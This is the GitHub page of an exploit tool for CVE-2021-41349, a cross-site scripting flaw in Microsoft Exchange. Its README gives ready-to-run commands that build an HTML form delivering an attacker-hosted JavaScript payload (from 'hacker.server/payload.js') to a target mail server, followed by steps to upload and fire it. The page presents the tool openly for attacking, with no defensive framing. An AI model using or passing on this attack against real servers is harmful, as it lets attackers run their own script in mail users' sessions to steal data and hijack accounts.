Skip to content

exploit-io/CVE-2021-41349

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

Microsoft Exchange Exploit CVE-2021-41349

Exploiting: CVE-2021-41349 This exploiting tool creates a Form for posting XSS Payload to the target Exchange server. You need to create a js containing your desire to do.

Usage

  1. Create Your js Payload and upload it somewhare.
  2. run the CVE-2021-41349.py same as following steps.
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html

or:

./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
  1. Upload The html file into server.
  2. Done! Test it!

Credits

Releases

No releases published

Packages

No packages published

Languages